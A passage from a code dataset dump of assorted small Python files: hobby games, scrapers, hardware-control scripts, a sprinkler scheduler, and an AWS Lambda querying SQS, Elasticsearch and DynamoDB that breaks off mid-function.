0\n","repo_name":"tkislan/smart-nvr","sub_path":"smart_nvr/camera/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42803827234","text":"import random\nGAME_LIMIT = 21\n\n\ndef roll_dice():\n user_roll = random.randint(1, 3)\n computer_roll = random.randint(1, 3)\n return user_roll, computer_roll\n\n\ndef get_response():\n response = input(\"Do you want to roll? (y/n): \")\n return response\n\n\ndef main():\n user_points = 0\n computer_points = 0\n print(\"Welcome to the game of 21!\")\n print()\n isEnd = False # added a is game end\n\n while not isEnd:\n answer = get_response()\n if(answer == \"y\"): # checkes whther still roll dice\n points, comp_points = roll_dice()\n user_points += points\n computer_points += comp_points\n print(\"User Points:\", user_points)\n print(\"Computer Points:\", computer_points)\n if user_points == GAME_LIMIT:\n print(\"User's Points:\", user_points)\n print(\"Computer's Points:\", computer_points)\n if computer_points == GAME_LIMIT:\n print(\"Tie Game!\")\n else:\n print(\"User Wins!\")\n isEnd = True\n if user_points > GAME_LIMIT:\n print(\"User's Points:\", user_points)\n print(\"Computer's Points:\", computer_points)\n if computer_points < GAME_LIMIT:\n print(\"Computer Wins!\")\n elif computer_points == GAME_LIMIT:\n print(\"Computer Wins!\")\n else:\n print(\"Tie Game!\")\n isEnd = True\n\n if (answer == \"n\"):\n isEnd = True\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"phamnhatcn06/python","sub_path":"buoi11/the21game.py","file_name":"the21game.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"60197919","text":"from webscraping.utilities.utility import descargarimagen, downloadinfo_url, downloadparrafos\nfrom tests.utilities import clean_up, clean_enlace\nimport os\n\n\n######UNIT TEST################\ndef test_descargarimagen():\n soup = clean_enlace()\n myimg = soup.findAll(\"img\")[0]\n descargarimagen(myimg)\n assert os.path.exists(\"400px-Municipalities_of_Spain.svg.png\") == True\n\ndef test_descargarparrafo():\n clean_up(\"*.txt\")\n soup = clean_enlace()\n downloadparrafos(soup)\n assert os.path.exists(\"Output.txt\") == True\n\n\n\n\n#######END TO END TEST#############\ndef test_main():\n clean_up(\"*.png\")\n clean_up(\"*.txt\")\n enlace = \"https://es.wikipedia.org/wiki/Anexo:Municipios_de_Espa%C3%B1a_por_poblaci%C3%B3n\"\n nimg = 4\n imagenes_desc = downloadinfo_url(enlace,nimg)\n for img in imagenes_desc:\n assert os.path.exists(img) == True\n assert len(imagenes_desc) == nimg\n assert os.path.exists(\"Output.txt\") == True\n\n\n\n\n\n ","repo_name":"jordicam/web-scraping","sub_path":"tests/test_general.py","file_name":"test_general.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73652225744","text":"import pywhatkit as kit\n\n\ndef yt_play(*arg, **kwargs):\n inp_command = kwargs.get(\"query\")\n kit.playonyt(inp_command)\n return \"Playing Video on Youtube\"\n\n\nif __name__ == \"__main__\":\n yt_play('play on youtube shape of you')\n","repo_name":"Dipeshpal/Jarvis_AI","sub_path":"JarvisAI/JarvisAI/features/youtube_play.py","file_name":"youtube_play.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":296,"dataset":"github-code","pt":"48"} +{"seq_id":"17112331335","text":"from google.cloud import bigquery\nfrom gspread_dataframe import get_as_dataframe, set_with_dataframe\nfrom google_auth_oauthlib import flow\nimport gspread\nimport sys\nimport argparse\nimport logging\n\ndef get_credentials(secrets, local):\n appflow = flow.InstalledAppFlow.from_client_secrets_file(secrets, scopes=[\"https://www.googleapis.com/auth/bigquery\", \"https://www.googleapis.com/auth/logging.write\", \"https://www.googleapis.com/auth/spreadsheets\"])\n\n if local:\n # Automatically set to run as host='localhost', port=8080\n appflow.run_local_server()\n else:\n appflow.run_console()\n\n return appflow.credentials\n\n\ndef setup_bq_client(credentials=None, projectid=None):\n if credentials:\n return bigquery.Client(project=projectid, credentials=credentials)\n return bigquery.Client()\n\ndef setup_sh_client(sheet_name, credentials=None, sheet_url=None):\n\n if credentials:\n gc = gspread.authorize(credentials)\n return gc.open_by_url(sheet_url)\n gc = gspread.service_account()\n return gc.open(sheet_name)\n\n\ndef bq_to_sheet(bqclient, sheet, query, tabname, job_config=None):\n\n # Run query and output to dataframe\n df_schema = bqclient.query(query, job_config=job_config).to_dataframe()\n\n # If worksheet does not exist, create and add dataframe\n try:\n worksheet = sheet.add_worksheet(tabname, df_schema.shape[0], df_schema.shape[1])\n set_with_dataframe(worksheet, df_schema)\n print(worksheet)\n except Exception as err:\n logging.error(RuntimeError('**********Failed to log the error*********'), err)\n else:\n # If worksheet exists, get and append dataframe\n worksheet = sheet.worksheet(tabname)\n existing = get_as_dataframe(worksheet)\n updated = existing.append(df_schema, sort=False)\n set_with_dataframe(worksheet, updated)\n\n return f\"Complete\"\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Function to query BigQuery and store it in Google Sheets.')\n\n parser.add_argument('-q','--query', help='BQ query',required=True, dest='query')\n parser.add_argument('-n','--sheetname', help='Google Sheet name', dest='sheet_name')\n parser.add_argument('-u','--sheeturl', help='Google Sheet url', dest='sheet_url')\n parser.add_argument('-t','--tabname', help='Google Sheet tab name to store the data.',required=True, dest='tabname')\n parser.add_argument('-j', '--jobconfig', help='Job configuration for the query if needed but not required', required=False, dest='job_config', default=None)\n parser.add_argument('-s', help='Json file that has the API credentials if setting up end user oauth https://cloud.google.com/docs/authentication/end-user', dest='secrets')\n parser.add_argument('-l','--local', help='If setting up oauth on your personal machine. It will help open a browswer window for authentication.', required=False, dest='local', type=bool , default=False)\n parser.add_argument('-p','--pi', help='Project ID', dest='projectid', default=None)\n\n par = parser.parse_args(sys.argv[1:])\n\n credentials = None\n if par.secrets:\n credentials = get_credentials(par.secrets, par.local)\n\n # Open BQ client\n bqclient = setup_bq_client(credentials, par.projectid)\n\n # Open Sheet client\n sheet = setup_sh_client(par.sheet_name, credentials, par.sheet_url)\n\n bq_to_sheet(bqclient, sheet, par.query, par.tabname, par.job_config)\n\n\n","repo_name":"google/project-OCEAN","sub_path":"archive/mailing-list-data-pipelines/3-analyze-data/sql/bq_to_sheet.py","file_name":"bq_to_sheet.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"48"} +{"seq_id":"5449995046","text":"import numpy as np\n\nfrom scipy.spatial import distance\n\n\ndef parse_input(input: str):\n return np.array(\n list(map(lambda line: list(map(int, line.split(\", \"))), input.splitlines()))\n )\n\n\ndef part1(points):\n xmin, ymin = points.min(axis=0) - 1\n xmax, ymax = points.max(axis=0) + 2\n\n xgrid, ygrid = np.meshgrid(np.arange(xmin, xmax), np.arange(xmin, xmax))\n targets = np.dstack([xgrid, ygrid]).reshape(-1, 2)\n\n cityblock = distance.cdist(points, targets, metric=\"cityblock\")\n\n closest_origin = np.argmin(cityblock, axis=0)\n\n min_distances = np.min(cityblock, axis=0)\n competing_locations_filter = (cityblock == min_distances).sum(axis=0) > 1\n\n closest_origin[competing_locations_filter] = len(points) + 1\n closest_origin = closest_origin.reshape(xgrid.shape)\n infinite_ids = np.unique(\n np.vstack(\n [\n closest_origin[0],\n closest_origin[-1],\n closest_origin[:, 0],\n closest_origin[:, -1],\n ]\n )\n )\n closest_origin[np.isin(closest_origin, infinite_ids)] = len(points) + 1\n\n return np.max(np.bincount(closest_origin.ravel())[:-1])\n\n\ndef part2(points):\n xmin, ymin = points.min(axis=0) - 1\n xmax, ymax = points.max(axis=0) + 2\n\n xgrid, ygrid = np.meshgrid(np.arange(xmin, xmax), np.arange(xmin, xmax))\n targets = np.dstack([xgrid, ygrid]).reshape(-1, 2)\n\n cityblock = distance.cdist(points, targets, metric=\"cityblock\")\n\n origin_distances = cityblock.sum(axis=0)\n\n region = np.where(origin_distances < 10000, 1, 0)\n\n return region.sum()\n\n\ndef solve(input: str) -> str:\n input = parse_input(input)\n return f\"Day06\\nPart1: {part1(input)}\\nPart2: {part2(input)}\\n\"\n","repo_name":"alexjercan/aoc-2018","sub_path":"src/day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3756155697","text":"\"\"\"Utilities for vector calculations.\"\"\"\nimport numpy as np\n\n\ndef fix_t_vectors(t1_poly, t2_poly, t3_poly):\n \"\"\"Ensure the orientation vectors are orthogonal and normalized.\"\"\"\n # normalize t3 so that remove_perp works\n t3_poly /= np.linalg.norm(t3_poly, axis=1)[:, None]\n # subtract the perpendicular projection of t1 on t3\n dot = np.sum(t1_poly * t3_poly, axis=1)\n t1_poly = t1_poly - dot[:, None] * t3_poly\n # now t1 is pointing in the correct direction, normalize it\n t1_poly /= np.linalg.norm(t1_poly, axis=1)[:, None]\n # reset t2 to the cross product of t3 and t1\n t2_poly = np.cross(t3_poly, t1_poly)\n return t1_poly, t2_poly, t3_poly\n","repo_name":"tseariana/dynamic_sim","sub_path":"twlcsim/util/_vector.py","file_name":"_vector.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41221752086","text":"# Pythonで動的ライブラリを利用する\nimport platform, os\nfrom ctypes import *\n\n# PythonでOSを判定 --- (*1)\npf = platform.system()\nprint(pf)\n\n# Windowsの場合 --- (*2)\nif pf == 'Windows': libfile = 'mycalc.dll'\n# macOSの場合\nelif pf == 'Darwin': libfile = 'libmycalc.dylib'\n# Linuxの場合\nelse: libfile = 'libmycalc.so'\n\n# 動的ライブラリのパスを指定 --- (*3)\nlibpath = os.path.join(os.path.dirname(__file__), libfile)\nprint(\"lib=\", libpath)\n\n# ライブラリをロード --- (*4)\nmycalc = cdll.LoadLibrary(libpath)\n# Rustのライブラリを実行 --- (*5)\nprint(mycalc.rust_mul(100, 8))\nprint(mycalc.rust_mul(8, 9))\n\n","repo_name":"kujirahand/book-rust","sub_path":"src/ch6/mycalc_test.py","file_name":"mycalc_test.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"ja","doc_type":"code","stars":71,"dataset":"github-code","pt":"48"} +{"seq_id":"42263629503","text":"import argparse\nfrom dataclasses import asdict\nfrom json import dumps\nfrom time import monotonic\n\nfrom covyx import analyze\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"\"\"\n Analyze a CT video,\n see https://github.com/catneep/covyx#readme\n for more information.\n \"\"\"\n )\n\n parser.add_argument(\"path\", type=str, help=\"Path to local .mp4 file\")\n parser.add_argument(\n \"--time\",\n dest=\"time\",\n default=False,\n action=\"store_true\",\n help=\"output the analysis time\",\n )\n parser.add_argument(\n \"--pretty\",\n dest=\"pretty\",\n default=False,\n action=\"store_true\",\n help=\"pretty print the result\",\n )\n\n args = parser.parse_args()\n\n path, time, pretty = args.path, args.time, args.pretty\n\n start = monotonic()\n result = analyze(path)\n end = monotonic() - start\n\n result_dict = asdict(result)\n\n if time:\n result_dict[\"runtime\"] = round(end, 4)\n\n if pretty:\n print(dumps(result_dict, indent=2, sort_keys=True))\n else:\n print(result_dict)\n","repo_name":"catneep/covyx","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18055735776","text":"import time\nimport RPi.GPIO as GPIO\n\n# Pin definitions (GPIO)\nonoff_pin = 23\ndirection_pin = 24\n\n# Use GPIO pin numbering\nGPIO.setmode(GPIO.BCM)\n\n# Set as output pins\nGPIO.setup(onoff_pin, GPIO.OUT)\nGPIO.setup(direction_pin, GPIO.OUT)\n\n# Put onoff pin off by default (otherwise motor will run)\nGPIO.output(onoff_pin, GPIO.LOW)\n\ndef go_up():\n\tGPIO.output(onoff_pin, GPIO.HIGH) # turn motor on\n\tGPIO.output(direction_pin, GPIO.HIGH) # direction up\n\t\n\ttime.sleep(10) # wait 10 seconds for blinds to go up\n\n\tGPIO.output(onoff_pin, GPIO.LOW) # turn motor off\n\ndef go_down():\n\tGPIO.output(onoff_pin, GPIO.HIGH) # turn motor on\n\tGPIO.output(direction_pin, GPIO.LOW) # direction down\n\n\ttime.sleep(10) # wait 10 seconds for blinds to go down\n\n\tGPIO.output(onoff_pin, GPIO.LOW)\n\ndef move_distance(distance):\n\tGPIO.output(onoff_pin, GPIO.HIGH) \t\t\t\t# turn motor on\n\tGPIO_direction_val = GPIO.LOW if distance < 0 else GPIO.HIGH\n\tGPIO.output(direction_pin, GPIO_direction_val) \t# set direction pin\n\t\n\tcm_to_seconds = 0.5\t\t\t\t\t\t\t\t# factor for conversion from cm to seconds (constant motor speed is asssumed)\n\t\n\ttime.sleep(abs(distance * cm_to_seconds))\t\t# wait x seconds to turn motor off\n\t\n\tGPIO.output(onoff_pin, GPIO.LOW) # turn motor off\n\t\n","repo_name":"TomPostmus/Rolluik","sub_path":"actuation.py","file_name":"actuation.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8570252473","text":"def main():\n students = []\n \n for _ in range(int(input())):\n name = input()\n score = float(input())\n students.append([name, score])\n\n second_lowest = sorted(list(set([score for name, score in students])), reverse=True)[-2] #making a set to remove duplicates.\n lowest_students = [name for name, score in sorted(students) if score == second_lowest]\n\n for i in lowest_students:\n print(i)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mustafaAtefmustafa/IEEE-ZSB-Technical-Rookies-22","sub_path":"Task2/problem_8_nested_list.py","file_name":"problem_8_nested_list.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28664243043","text":"'''\n Curve Fit Attempt 1\n'''\n\nimport numpy as numpy\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\na = 2\nc = 0\ndef fun(x, a ,c):\n return a*x + c\n\nx = [-2,-1,0, 1,2]\ny = [-4,-2,0.1,2,4]\nf = [-4,-2,0, 2,4]\n\nb = curve_fit(fun(x, a, c), x,f)\n\nprint(b[0])","repo_name":"DanielxDWhite/Y4Project","sub_path":"Simulation/VisualS/EOM/Attempt 1.py","file_name":"Attempt 1.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23999357955","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = 'Rimco'\n\n# System imports\nfrom threading import Thread\nimport datetime\nimport time\nimport logging\nimport traceback\n\n# Local imports\nfrom ospy.inputs import inputs\nfrom ospy.log import log\nfrom ospy.options import level_adjustments\nfrom ospy.options import options\nfrom ospy.options import rain_blocks\nfrom ospy.programs import programs\nfrom ospy.runonce import run_once\nfrom ospy.stations import stations\nfrom ospy.outputs import outputs\n\n\ndef predicted_schedule(start_time, end_time):\n \"\"\"Determines all schedules for the given time range.\n To calculate what should currently be active, a start time of some time (a day) ago should be used.\"\"\"\n\n adjustment = level_adjustments.total_adjustment()\n max_usage = options.max_usage\n delay_delta = datetime.timedelta(seconds=options.station_delay)\n\n rain_block_start = datetime.datetime.now()\n rain_block_end = rain_blocks.block_end()\n\n skip_intervals = log.finished_runs() + log.active_runs()\n current_active = [interval for interval in skip_intervals if not interval['blocked']]\n\n usage_changes = {}\n for active in current_active:\n start = active['start']\n end = active['end']\n if start not in usage_changes:\n usage_changes[start] = 0\n if end not in usage_changes:\n usage_changes[end] = 0\n\n usage_changes[start] += active['usage']\n usage_changes[end] -= active['usage']\n\n station_schedules = {}\n\n # Get run-once information:\n for station in stations.enabled_stations():\n run_once_intervals = run_once.active_intervals(start_time, end_time, station.index)\n for interval in run_once_intervals:\n if station.index not in station_schedules:\n station_schedules[station.index] = []\n\n new_schedule = {\n 'active': None,\n 'program': -1,\n 'program_name': \"Run-Once\",\n 'fixed': True,\n 'cut_off': 0,\n 'manual': True,\n 'blocked': False,\n 'start': interval['start'],\n 'original_start': interval['start'],\n 'end': interval['end'],\n 'uid': '%s-%s-%d' % (str(interval['start']), \"Run-Once\", station.index),\n 'usage': station.usage\n }\n station_schedules[station.index].append(new_schedule)\n\n # Get run-now information:\n if programs.run_now_program is not None:\n program = programs.run_now_program\n for station in sorted(program.stations):\n run_now_intervals = program.active_intervals(start_time, end_time, station)\n for interval in run_now_intervals:\n if station >= stations.count() or stations.master == station or not stations[station].enabled:\n continue\n\n if station not in station_schedules:\n station_schedules[station] = []\n\n program_name = \"%s (Run-Now)\" % program.name\n\n new_schedule = {\n 'active': None,\n 'program': -1,\n 'program_name': program_name,\n 'fixed': True,\n 'cut_off': 0,\n 'manual': True,\n 'blocked': False,\n 'start': interval['start'],\n 'original_start': interval['start'],\n 'end': interval['end'],\n 'uid': '%s-%s-%d' % (str(interval['start']), program_name, station),\n 'usage': stations.get(station).usage\n }\n station_schedules[station].append(new_schedule)\n\n # Aggregate per station:\n for program in programs.get():\n if not program.enabled:\n continue\n\n for station in sorted(program.stations):\n program_intervals = program.active_intervals(start_time, end_time, station)\n\n if station >= stations.count() or stations.master == station or not stations[station].enabled:\n continue\n\n if station not in station_schedules:\n station_schedules[station] = []\n\n for interval in program_intervals:\n if current_active and current_active[-1]['original_start'] > interval['start']:\n continue\n\n new_schedule = {\n 'active': None,\n 'program': program.index,\n 'program_name': program.name, # Save it because programs can be renamed\n 'fixed': program.fixed,\n 'cut_off': program.cut_off/100.0,\n 'manual': program.manual,\n 'blocked': False,\n 'start': interval['start'],\n 'original_start': interval['start'],\n 'end': interval['end'],\n 'uid': '%s-%d-%d' % (str(interval['start']), program.index, station),\n 'usage': stations.get(station).usage\n }\n station_schedules[station].append(new_schedule)\n\n # Make lists sorted on start time, check usage\n for station in station_schedules:\n if 0 < max_usage < stations.get(station).usage:\n station_schedules[station] = [] # Impossible to schedule\n else:\n station_schedules[station].sort(key=lambda inter: inter['start'])\n\n all_intervals = []\n # Adjust for weather and remove overlap:\n for station, schedule in station_schedules.items():\n for interval in schedule:\n if not interval['fixed']:\n time_delta = interval['end'] - interval['start']\n time_delta = datetime.timedelta(seconds=(time_delta.days * 24 * 3600 + time_delta.seconds) * adjustment)\n interval['end'] = interval['start'] + time_delta\n interval['adjustment'] = adjustment\n else:\n interval['adjustment'] = 1.0\n\n last_end = datetime.datetime(2000, 1, 1)\n for interval in schedule:\n if last_end > interval['start']:\n time_delta = last_end - interval['start']\n interval['start'] += time_delta\n interval['end'] += time_delta\n last_end = interval['end']\n\n new_interval = {\n 'station': station\n }\n new_interval.update(interval)\n\n all_intervals.append(new_interval)\n\n # Make list of entries sorted on duration and time (stable sorted on station #)\n all_intervals.sort(key=lambda inter: inter['end'] - inter['start'])\n all_intervals.sort(key=lambda inter: inter['start'])\n\n # If we have processed some intervals before, we should skip all that were scheduled before them\n for to_skip in skip_intervals:\n index = 0\n while index < len(all_intervals):\n interval = all_intervals[index]\n\n if interval['original_start'] < to_skip['original_start'] and (not to_skip['blocked'] or interval['blocked']):\n del all_intervals[index]\n elif interval['uid'] == to_skip['uid']:\n del all_intervals[index]\n break\n else:\n index += 1\n\n # And make sure manual programs get priority:\n all_intervals.sort(key=lambda inter: not inter['manual'])\n\n # Try to add each interval\n for interval in all_intervals:\n if not interval['manual'] and not options.scheduler_enabled:\n interval['blocked'] = 'disabled scheduler'\n continue\n elif not interval['manual'] and not stations.get(interval['station']).ignore_rain and \\\n rain_block_start <= interval['start'] < rain_block_end:\n interval['blocked'] = 'rain delay'\n continue\n elif not interval['manual'] and not stations.get(interval['station']).ignore_rain and inputs.rain_sensed():\n interval['blocked'] = 'rain sensor'\n continue\n elif not interval['fixed'] and interval['adjustment'] < interval['cut_off']:\n interval['blocked'] = 'cut-off'\n continue\n\n if max_usage > 0:\n usage_keys = sorted(usage_changes.keys())\n start_usage = 0\n start_key_index = -1\n\n for index, key in enumerate(usage_keys):\n if key > interval['start']:\n break\n start_key_index = index\n start_usage += usage_changes[key]\n\n failed = False\n finished = False\n while not failed and not finished:\n parallel_usage = 0\n parallel_current = 0\n for index in range(start_key_index+1, len(usage_keys)):\n key = usage_keys[index]\n if key >= interval['end']:\n break\n parallel_current += usage_changes[key]\n parallel_usage = max(parallel_usage, parallel_current)\n\n if start_usage + parallel_usage + interval['usage'] <= max_usage:\n\n start = interval['start']\n end = interval['end']\n if start not in usage_changes:\n usage_changes[start] = 0\n if end not in usage_changes:\n usage_changes[end] = 0\n\n usage_changes[start] += interval['usage']\n usage_changes[end] -= interval['usage']\n finished = True\n else:\n while not failed:\n # Shift this interval to next possibility\n start_key_index += 1\n\n # No more options\n if start_key_index >= len(usage_keys):\n failed = True\n else:\n next_option = usage_keys[start_key_index]\n next_change = usage_changes[next_option]\n start_usage += next_change\n\n # Lower usage at this starting point:\n if next_change < 0:\n skip_delay = False\n if options.min_runtime > 0:\n # Try to determine how long we have been running at this point:\n min_runtime_delta = datetime.timedelta(seconds=options.min_runtime)\n temp_usage = 0\n running_since = next_option\n not_running_since = next_option\n for temp_index in range(0, start_key_index):\n temp_usage_key = usage_keys[temp_index]\n if temp_usage < 0.01 and usage_changes[temp_usage_key] > 0 and temp_usage_key - not_running_since > datetime.timedelta(seconds=3):\n running_since = temp_usage_key\n temp_usage += usage_changes[temp_usage_key]\n if temp_usage < 0.01 and usage_changes[temp_usage_key] < 0:\n not_running_since = temp_usage_key\n if next_option - running_since < min_runtime_delta:\n skip_delay = True\n\n if skip_delay:\n time_to_next = next_option - interval['start']\n else:\n time_to_next = next_option + delay_delta - interval['start']\n\n interval['start'] += time_to_next\n interval['end'] += time_to_next\n break\n\n if failed:\n logging.warning('Could not schedule %s.', interval['uid'])\n interval['blocked'] = 'scheduler error'\n\n\n\n all_intervals.sort(key=lambda inter: inter['start'])\n\n return all_intervals\n\n\ndef combined_schedule(start_time, end_time):\n current_time = datetime.datetime.now()\n if current_time < start_time:\n result = predicted_schedule(start_time, end_time)\n elif current_time > end_time:\n result = [entry for entry in log.finished_runs() if start_time <= entry['start'] <= end_time or\n start_time <= entry['end'] <= end_time]\n else:\n result = log.finished_runs()\n result += log.active_runs()\n predicted = predicted_schedule(start_time, end_time)\n result += [entry for entry in predicted if current_time <= entry['start'] <= end_time]\n\n return result\n\n\nclass _Scheduler(Thread):\n def __init__(self):\n super(_Scheduler, self).__init__()\n self.daemon = True\n #options.add_callback('scheduler_enabled', self._option_cb)\n options.add_callback('manual_mode', self._option_cb)\n options.add_callback('master_relay', self._option_cb)\n\n # If manual mode is active, finish all stale runs:\n if options.manual_mode:\n log.finish_run(None)\n\n def _option_cb(self, key, old, new):\n # Clear if manual mode changed:\n if key == 'manual_mode':\n programs.run_now_program = None\n run_once.clear()\n log.finish_run(None)\n stations.clear()\n\n # Stop relay if not used anymore:\n if key == 'master_relay' and not new and outputs.relay_output:\n outputs.relay_output = False\n\n def run(self):\n # Activate outputs upon start if needed:\n current_time = datetime.datetime.now()\n rain = not options.manual_mode and (rain_blocks.block_end() > datetime.datetime.now() or\n inputs.rain_sensed())\n active = log.active_runs()\n for entry in active:\n ignore_rain = stations.get(entry['station']).ignore_rain\n if entry['end'] > current_time and (not rain or ignore_rain) and not entry['blocked']:\n stations.activate(entry['station'])\n\n while True:\n try:\n self._check_schedule()\n except Exception:\n logging.warning('Scheduler error:\\n' + traceback.format_exc())\n time.sleep(1)\n\n @staticmethod\n def _check_schedule():\n current_time = datetime.datetime.now()\n check_start = current_time - datetime.timedelta(days=1)\n check_end = current_time + datetime.timedelta(days=1)\n\n rain = not options.manual_mode and (rain_blocks.block_end() > datetime.datetime.now() or\n inputs.rain_sensed())\n\n active = log.active_runs()\n for entry in active:\n ignore_rain = stations.get(entry['station']).ignore_rain\n if entry['end'] <= current_time or (rain and not ignore_rain and not entry['blocked'] and not entry['manual']):\n log.finish_run(entry)\n if not entry['blocked']:\n stations.deactivate(entry['station'])\n\n if not options.manual_mode:\n schedule = predicted_schedule(check_start, check_end)\n #import pprint\n #logging.debug(\"Schedule: %s\", pprint.pformat(schedule))\n for entry in schedule:\n if entry['start'] <= current_time < entry['end']:\n log.start_run(entry)\n if not entry['blocked']:\n stations.activate(entry['station'])\n\n if stations.master is not None or options.master_relay:\n master_on = False\n\n # It's easy if we don't have to use delays:\n if options.master_on_delay == options.master_off_delay == 0:\n for entry in active:\n if not entry['blocked'] and stations.get(entry['station']).activate_master:\n master_on = True\n break\n\n else:\n # In manual mode we cannot predict, we only know what is currently running and the history\n if options.manual_mode:\n active = log.finished_runs() + active\n else:\n active = combined_schedule(check_start, check_end)\n\n for entry in active:\n if not entry['blocked'] and stations.get(entry['station']).activate_master:\n if entry['start'] + datetime.timedelta(seconds=options.master_on_delay) \\\n <= current_time < \\\n entry['end'] + datetime.timedelta(seconds=options.master_off_delay):\n master_on = True\n break\n\n if stations.master is not None:\n master_station = stations.get(stations.master)\n\n if master_on != master_station.active:\n master_station.active = master_on\n\n if options.master_relay:\n if master_on != outputs.relay_output:\n outputs.relay_output = master_on\n\nscheduler = _Scheduler()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Rimco/OSPy","sub_path":"ospy/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":17366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"20560166057","text":"\"\"\"\nTests jetson to controllers by publishing velocity commands\n\"\"\"\n\nimport rospy\nfrom geometry_msgs.msg import Twist\n\nmotor_pub = rospy.Publisher('/cmd_vel', Twist, queue_size=100)\ntwist = Twist()\ntwist.linear.y = 0\ntwist.linear.z = 0\ntwist.angular.x = 0\ntwist.angular.y = 0\ntwist.angular.z = 1.2\ntwist.linear.x = 1.2\n\nrospy.init_node('motor_controller_test', anonymous=True)\n\nwhile not rospy.is_shutdown():\n motor_pub.publish(twist)","repo_name":"RoboticsClubatUCF/AGV","sub_path":"ugv_hardware/ugv_hardware/src/cmd_vel_test.py","file_name":"cmd_vel_test.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"74641051346","text":"import boto3\nimport json\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom botocore.vendored import requests\nfrom botocore.exceptions import ClientError\nfrom requests_aws4auth import AWS4Auth\nimport requests\n\n\ndef receive_sqs_message(queue_url):\n sqs = boto3.client(\"sqs\")\n\n response = sqs.receive_message(\n QueueUrl=queue_url, \n AttributeNames=['SentTimestamp'],\n MessageAttributeNames=['All'],\n VisibilityTimeout=0,\n WaitTimeSeconds=0\n )\n messages = response.get('Messages', [])\n if not messages:\n print(\"No messages in the queue\")\n return None\n message = messages[0]\n sqs.delete_message(\n QueueUrl=queue_url,\n ReceiptHandle=message['ReceiptHandle']\n )\n print('Received and deleted message: %s' % response)\n return message\n\ndef create_aws_auth():\n \"\"\"\n Create AWS authentication using boto3 credentials.\n \"\"\"\n region = 'us-east-1'\n service = 'es'\n credentials = boto3.Session(\n aws_access_key_id=\"\", \n aws_secret_access_key=\"\", \n region_name=\"us-east-1\"\n ).get_credentials()\n awsauth = AWS4Auth(\n credentials.access_key, \n credentials.secret_key, \n region, \n service, \n session_token=credentials.token\n )\n return awsauth\n\ndef build_es_query(cuisine):\n \"\"\"\n Build the Elasticsearch query based on the cuisine.\n \"\"\"\n return {\n \"size\": 1300,\n \"query\": {\n \"query_string\": {\n \"default_field\": \"cuisine\",\n \"query\": cuisine\n }\n }\n }\n\ndef find_restaurant_from_elasticsearch(cuisine):\n \"\"\"\n Search for restaurants in Elasticsearch based on cuisine.\n \"\"\"\n host = 'search-yelpdata-bsjyud2u3efoaw2cr224ym7avy.us-east-1.es.amazonaws.com'\n index = 'yelpdata'\n url = f'https://{host}/{index}/_search'\n awsauth = create_aws_auth()\n headers = {\"Content-Type\": \"application/json\"}\n \n query = build_es_query(cuisine)\n\n\n response = requests.get(url, auth=awsauth, headers=headers, data=json.dumps(query))\n \n try:\n res = response.json()\n no_of_hits = res['hits']['total']\n hits = res['hits']['hits']\n except:\n print(\"An error occurred.\")\n return []\n\n business_ids = [str(hit['_id']) for hit in hits]\n return business_ids\n\n\n\ndef retrieve_message_info(message):\n \"\"\"\n Retrieve relevant information from the SQS message.\n \"\"\"\n try:\n cuisine = message[\"MessageAttributes\"][\"Cuisine\"][\"StringValue\"]\n location = message[\"MessageAttributes\"][\"Location\"][\"StringValue\"]\n date = message[\"MessageAttributes\"][\"DiningDate\"][\"StringValue\"]\n time = message[\"MessageAttributes\"][\"DiningTime\"][\"StringValue\"]\n numOfPeople = message[\"MessageAttributes\"][\"NumberOfPeople\"][\"StringValue\"]\n email = message[\"MessageAttributes\"][\"Email\"][\"StringValue\"]\n sessionID = message[\"MessageAttributes\"][\"sessionID\"][\"StringValue\"]\n return cuisine, location, date, time, numOfPeople, email, sessionID\n except KeyError:\n print(\"Invalid message format. Missing required keys.\")\n return None, None, None, None, None, None\n\ndef fetch_restaurant_info(business_ids, max_results=5):\n \"\"\"\n Fetch restaurant information for the given business IDs from DynamoDB.\n \"\"\"\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table('YelpRestaurants')\n restaurant_info = []\n\n # Iterate through business IDs and retrieve restaurant information\n itr = 1\n for business_id in business_ids:\n if itr > max_results:\n break\n \n response = table.get_item(Key={'bID': business_id})\n item = response.get('Item')\n if 